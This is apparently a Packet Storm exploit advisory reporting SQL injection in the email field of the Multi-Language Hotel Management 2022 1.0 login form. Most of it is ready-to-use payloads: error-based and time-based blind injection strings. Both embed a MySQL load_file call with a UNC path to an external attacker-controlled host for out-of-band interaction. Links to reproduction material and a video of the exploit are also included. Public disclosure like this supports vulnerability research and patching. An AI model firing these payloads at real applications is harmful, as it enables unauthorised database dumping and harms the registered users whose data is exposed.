Multi-Language Hotel Management 2022 1.0 SQL Injection
Source: https://packetstormsecurity.com/files/167912/mlhm202210-sql.txt (published 2022-08-03)

## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi
## Author: nu11secur1ty
## Date: 08.03.2022
## Vendor: https://www.nikhilbhalerao.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022

## Description:
The `email` parameter of the login form appears to be vulnerable to SQL injection.
The payload '+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+' was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a host on an external domain.
An attacker can easily retrieve the entire database of this hotel system and act maliciously against the users registered in it.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=hmqHtDjH@burpcollaborator.net'+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT 0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT COUNT(*),CONCAT(0x7162787671,(SELECT (ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=m5S!k0l!S6&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=hmqHtDjH@burpcollaborator.net'+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT 0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM (SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022)

## Proof and Exploit:
[href](https://streamable.com/uk7zq2)